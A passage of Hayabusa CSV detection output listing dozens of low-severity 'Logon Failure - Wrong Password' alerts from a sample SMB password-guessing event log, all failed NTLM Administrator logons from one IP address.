NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.415 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v0hA1XvRIlqwKG6g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.464 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mKXKkvlHvjRh33Vw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.582 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JIMTGRC5IQlkrG9c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.658 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NYcLsxwbg8LkGCuQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.720 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kmttijRBtXqEbU0W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.765 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXC3hYI1Gin59gvG | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.807 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hQiozAIr9Jgklmks | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.844 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O598IvZRpbdU1liO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.888 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xlmYWrAnn3sUNSRk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.933 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aAAkO0uOGIq8zVM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.968 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 26K4BIpgUbBNWbDM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.008 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
moW3Ts7edqoQ9XeU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.052 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l8C4d3xE0QkWywbf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.086 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K1EgYFhtgrcjtcXM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.116 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7avpgQeA0KCIme9Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.164 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YFgmt3OEw4cDfPhG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.214 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OqITdE5K63nJg9tg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.306 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: zBs4fYCiprxgDd43 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.355 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VtBD0Q2szeURxMYA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.502 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KPUi2NhPP92Rs3hy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.561 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2PrbMf9E0fOuwIB8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.613 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 807zsxQ9WETO9YIp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.660 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZGMJKRYUlmijJV40 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.706 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: Xv33to031A0fQzX2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.753 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IT0bzycur7HXFeLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.793 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kyY2K7tT0HgQ1ZL3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.844 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6aexuFPH6FyEZ1bN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.884 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o8Iojas6sznqlYUE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.924 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U2SnliYkmx59ACSM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.971 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: 2plWY1GZHilHv5Vh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.005 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XIfmqihMJdPVz80p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.047 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Odg692Eyde8md0t7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.083 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gsQNvf5HkRQnbDul | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.134 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: il2DGq3bzfwGuJN4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.183 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9OsQFOcIyougrx0E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.228 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gR8wpQrGYzd4NrBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.282 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KFjRsjWXbEPs9m1I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.320 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wbjudOy3rWefzAIv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.360 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Q4gc8keCTv2HeE3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.414 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SmsaxHrHYuofUhAH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.457 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CvhWasTJYmChfsNU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:52:20.497 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DszGfEo9aua2y5UC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.544 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lZPScjxczbrcJuvJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.592 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ucpjxJV4rBXOxy4e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.636 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BmTtDfX05VsKFrON | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.677 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HhWSUkQhv089RSfJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.729 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i8RXCiXQYgjuPO78 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.773 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pfB3u3Np38FOw6hc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.813 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I9GcSmto4jdCIw6H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.860 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HsogJdHUcldt7JeH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.906 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IUbkohKtCy6joOBY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.954 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9ZFyYxBrKnz652Co | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.001 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQ2MHr71xALFHJqN | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.044 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cgjHOgEYRLQiJX75 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.092 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QXLjSNCeDAaX4ttQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.137 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: np6hwdqnWLJawVn9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.180 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: adqqChrYx3lZ0BAa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.232 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1GTXkOnNYTws1MiC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.266 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
5QUvFvCM6AJhKjXe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.304 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NiVgC8oJ5W2Xr3t0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.348 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hXfhdrbLnNOGDqy6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.388 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OcjMGbrHQHxIhSSh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.432 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LDYPTYHHKAe39GjM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.481 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2PF3H6LE6MqFjVWx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.526 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: LLTReOoxRa7UAhT3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.576 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jqtqwAPBiBfaHNpv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.619 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jmisFXzDpOILUhIX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.737 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W5UHqVVAYK08FWit | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.785 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PKHLHN59FDnD92Sm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.829 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ohAKPRGvg1JCQ91y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.879 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: pxdcrng84HEG39nJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.926 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lFGXFxHPbxDTGmiN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.965 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tyFnafBgzoLQWTQR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.024 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2IjLjxkd2pX4moFy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.085 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9vqYC4KotCYTcQv5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.128 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qtHcYFIOHglQFb60 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.192 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
